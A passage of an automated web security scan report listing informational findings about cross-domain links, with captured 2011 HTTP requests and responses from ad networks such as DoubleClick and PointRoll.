Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/227430/chrome_os_will_likely_include_netflix_support.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:28:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6571

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
<!-- Code auto-generated on Thu Apr 21 16:01:44 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
3D%3fhttp://www.cdw.com/shop/search/hubs/Computers/Notebook-Computers/C3.aspx?cm_mmc=OnlineAds_FY2011%7CCDW%7CBRD_Launch-_-PC+World-_-Notebooks_Desktops%7C728x90-_-94693_CSM_Notebooks_Mutli_728x90_A1"><img src="http://s0.2mdn.net/2524173/94693_CSM_Notebooks_Mutli_728x90_G_DEFAULT.jpg" width="728" height="90" border="0" alt="Advertisement" galleryimg="no"></a></noscript>
<script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p82806590&PRAd=58779352&AR_C=41840727"></script>
...[SNIP]...
13.13. http://ad.doubleclick.net/adj/N3175.128132.INTERCLICK/B4640114.13  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3175.128132.INTERCLICK/B4640114.13

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/N3175.128132.INTERCLICK/B4640114.13;sz=728x90;click=http://a1.interclick.com/icaid/128532/tid/90df8958-3bc8-447a-814c-22d9a8bc7403/click.ic?;ord=634407895642572718? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mysuburbanlife.com/lyons/lifestyle/entertainment/x1539859994/To-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 13:32:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 451

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b05/c/58/%2a/u;228460638;1-0;0;50162118;3454-728/90;39961083/39978870/1;;~sscs=%3fhttp://a1.interclick.com/icaid/128532/tid/90df8958-3bc8-447a-814c-22d9a8bc7403/click.ic?http%3a%2f%2fwww.transunion.com/%3Fam%3D2060%26channel%3Dpaid%26cid%3Ddisplay%3A2060"><img src="http://s0.2mdn.net/viewad/2769103/Surprise_728x90_Free2011Score.gif" border=0 alt="Advertisement"></a>
...[SNIP]...
13.14. http://ad.doubleclick.net/adj/N3175.128132.INTERCLICK/B4640114.14  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3175.128132.INTERCLICK/B4640114.14

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/N3175.128132.INTERCLICK/B4640114.14;sz=160x600;click=http://a1.interclick.com/icaid/128530/tid/9899f3f5-eb5e-4147-a06e-1ee8eea7fbea/click.ic?;ord=634407895851025795? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mysuburbanlife.com/lyons/lifestyle/entertainment/x1539859994/To-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 13:32:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 453

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b05/c/58/%2a/k;228458122;1-0;0;50162128;2321-160/600;39961085/39978872/1;;~sscs=%3fhttp://a1.interclick.com/icaid/128530/tid/9899f3f5-eb5e-4147-a06e-1ee8eea7fbea/click.ic?http%3a%2f%2fwww.transunion.com/%3Fam%3D2060%26channel%3Dpaid%26cid%3Ddisplay%3A2060"><img src="http://s0.2mdn.net/viewad/2769103/Surprise_160x600_Free2011Score.gif" border=0 alt="Advertisement"></a>
...[SNIP]...
13.15. http://ad.doubleclick.net/adj/cdg.examiner2.national/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cdg.examiner2.national/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/cdg.examiner2.national/;tt=fight%20sports;plc=national;chn=sports;subc=fight%20sports;sect=fight%20sports;nid=33045071;top=sports;top=fight%20sports;ed=national;uid=1501231;etid=21442;pgtp=article;tile=13;pos=13;sz=300x252;kw=;ord=744380001? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 13:31:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 246

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b05/0/0/%2a/m;44306;0-0;0;47526671;18205-300/252;0/0/0;;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
13.16. http://ad.doubleclick.net/adj/idgt.data.advertisers/laptops  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/idgt.data.advertisers/laptops

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/idgt.data.advertisers/laptops;sz=1x1;ord=77720659?? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/227430/chrome_os_will_likely_include_netflix_support.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 254
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 12 May 2011 13:28:26 GMT
Expires: Thu, 12 May 2011 13:28:26 GMT
Discarded: true

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b05/0/0/%2a/o;44306;0-0;0;57416746;31-1/1;0/0/0;;~aopt=2/1/ff/0;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
13.17. http://ad.doubleclick.net/adj/imdb2.consumer.title/maindetails  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/imdb2.consumer.title/maindetails

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/imdb2.consumer.title/maindetails;tile=3;sz=728x90,1008x150,1008x200,1008x30,9x1;p=t;p=top;ct=com;g=h;m=R;tt=f;k=u;id=tt0758746;k=c;k=t;coo=usa;;u=9950704628136008;ord=9950704628136008? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/images/SF99c7f777fc74f1d954417f99b985a4af/a/ifb/doubleclick/expand.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 13:32:31 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9383

document.write('<!-- emulator keys : PH_2=90&PH_8=Flash%20Persistence&template=Adbox&mode=form&PH_9=fp%3Dtrue&PH_44=5&PH_3=%23ffffff&u=http%3A%2F%2Fimdb.alexatoolbars.com%2F&PH_45=http%3A%2F%2Fia.medi
...[SNIP]...
<a href="'+clickThru+'" target="_blank"><img src="http://ia.media-imdb.com/images/M/MV5BMTc2NDYxMTM5NF5BMl5BZ2lmXkFtZTcwNzgxNzAzNA@@._V1_.gif" width="'+swfWidth+'" height="'+swfHeight+'" border="0""></a>
...[SNIP]...
13.18. http://ad.doubleclick.net/adj/mash.to/atf_j_s/tech  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/mash.to/atf_j_s/tech

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/mash.to/atf_j_s/tech;sec0=tech;pos=atf;tag=adj;mtype=standard;testmode=on;dcopt=ist;sz=728x90;tile=2;ord=1305206811? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 13:28:31 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 1096

document.write('<iframe src=\"http://view.atdmt.com/HAC/iview/310320258/direct/01/2343109?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b05/3/0/%2a/e%3B239762321%3B0-0%3B1%3B61843369%3B3454-728/90%3
...[SNIP]...
eclick.net/click%3Bh%3Dv8/3b05/3/0/%2a/e%3B239762321%3B0-0%3B1%3B61843369%3B3454-728/90%3B41684521/41702308/1%3B%3B%7Esscs%3D%3fhttp://clk.atdmt.com/HAC/go/310320258/direct/01/2343109" target="_blank"><img src="http://view.atdmt.com/HAC/view/310320258/direct/01/2343109"/></a>
...[SNIP]...
13.19. http://ad.doubleclick.net/adj/mash.to/btf_j_s/tech  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/mash.to/btf_j_s/tech

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/mash.to/btf_j_s/tech;sec0=tech;pos=btf;tag=adj;mtype=standard;testmode=on;sz=125x125;tile=7;ord=1305206811? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 13:28:57 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 414

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b05/0/0/%2a/l;235082834;0-0;0;58802883;3-125/125;40300478/40318265/1;;~fdr=237741645;0-0;0;61974154;3-125/125;41044401/41062188/1;;~sscs=%3fhttp://www.clickatell.com/central/campaigns/redir.php?cid=177962"><img src="http://s0.2mdn.net/viewad/2074920/125X125_developer_lineup_06.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
13.20. http://admeld-match.dotomi.com/admeld/match  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://admeld-match.dotomi.com
Path:   /admeld/match

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /admeld/match?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=78&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld-match.dotomi.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf?t=1305206897249&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:28:35 GMT
X-Name: rtb-o05
Cache-Control: max-age=0, no-store
Content-Type: text/javascript
Connection: close
Content-Length: 132

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=78&external_user_id=0&expiration=1305466115" alt="" />');
13.21. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /PortalServe/?pid=1245872D28820110329161145&pub=un15138&flash=10&time=4|8:31|-5&redir=http://ads.undertone.com/c?oaparams=2__bannerid=191501__campaignid=31210__zoneid=15138__UTLCA=1__cb=0868f0de93164900a3d4042d4f116630__bk=ll347o__id=6e71z3o27cnh1ioxqreihytn2__oadest=$CTURL$&r=0.510057557374239 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRsl=11042210442417319321424330526S; PRvt=CGJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2EouvAb7yDAEECAeJozEovALEa7O!E7BCeJpJEotn9OvPEAzwCAeJjUEotmZjrmKAEcCDe; PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6; PRimp=14A30400-7732-07F8-1209-989000080200; PRca=|AKNx*1039:1|AKDn*23939:2|AKLC*1774:2|AKTy*9203:2|AKRD*2017:4|AKQh*130:3|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:16|AKPE*832:3|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#; PRcp=|AKNxAAQl:1|AKDnAGOH:2|AKPEAADS:1|AKRDAJme:3|AKLCAA2c:2|AKTyACY1:2|AKRDAA67:1|AKQhAACG:3|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:5|AKVYAACD:1|AKQkAFx5:4|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#; PRpl=|FOGh:1|FVpf:2|FYnn:1|FOO8:1|FZt1:1|FZt2:1|FZt3:1|FWcM:1|FW9q:2|FW9n:2|FKqE:2|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:3|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#; PRcr=|GJX7:1|GLBY:2|GK5Q:1|GJTu:1|GMjA:1|GMSn:1|GKwo:2|GLLp:2|GMjB:2|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:7|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#; PRpc=|FOGhGJX7:1|FVpfGLBY:2|FYnnGK5Q:1|FOO8GJTu:1|FZt1GMjB:1|FZt2GMjA:1|FZt3GMSn:1|FWcMGLLp:1|FW9qGLZC:2|FW9nGLZC:2|FKqEGKwo:2|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:3|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 13:31:01 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 1808
Set-Cookie:PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=14A30400-4033-E2F7-1209-9890000A0200; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKNx*1039:2|AKDn*23939:2|AKLC*1774:2|AKTy*9203:2|AKRD*2017:4|AKQh*130:3|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:16|AKPE*832:3|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKNxAAQl:2|AKDnAGOH:2|AKPEAADS:1|AKRDAJme:3|AKLCAA2c:2|AKTyACY1:2|AKRDAA67:1|AKQhAACG:3|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:5|AKVYAACD:1|AKQkAFx5:4|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FOGi:1|FOGh:1|FVpf:2|FYnn:1|FOO8:1|FZt1:1|FZt2:1|FZt3:1|FWcM:1|FW9q:2|FW9n:2|FKqE:2|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:3|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GJX6:1|GJX7:1|GLBY:2|GK5Q:1|GJTu:1|GMjA:1|GMSn:1|GKwo:2|GLLp:2|GMjB:2|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:7|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FOGiGJX6:1|FOGhGJX7:1|FVpfGLBY:2|FYnnGK5Q:1|FOO8GJTu:1|FZt1GMjB:1|FZt2GMjA:1|FZt3GMSn:1|FWcMGLLp:1|FW9qGLZC:2|FW9nGLZC:2|FKqEGKwo:2|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:3|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
</style><a target='_blank' href='http://ads.undertone.com/c?oaparams=2__bannerid=191501__campaignid=31210__zoneid=15138__UTLCA=1__cb=0868f0de93164900a3d4042d4f116630__bk=ll347o__id=6e71z3o27cnh1ioxqreihytn2__oadest=http://clk.pointroll.com/bc/?a=1466022&c=1&i=14A30400-4033-E2F7-1209-9890000A0200&clickurl=http://www.woodmaster.com/email_flexfuel/'><img border=0 width='300' height='250' style='width:300px;height:250px' src='http://speed.pointroll.com/PointRoll/Media/Banners/NorthwestManufacturing/857428/FlexFuel_300x250.jpg?PRAd=1466022&PRCID=146
...[SNIP]...
13.22. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /PortalServe/?pid=1245871K78320110329161145&pub=un15137&flash=10&time=4|8:30|-5&redir=http://ads.undertone.com/c?oaparams=2__bannerid=191502__campaignid=31210__zoneid=15137__UTLCA=1__cb=8dbd1f42d1bf401eaacad663ab76a557__bk=ll347b__id=5jwh0duijqd7vngjkwzq6zqds__oadest=$CTURL$&r=0.13133104098960757 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
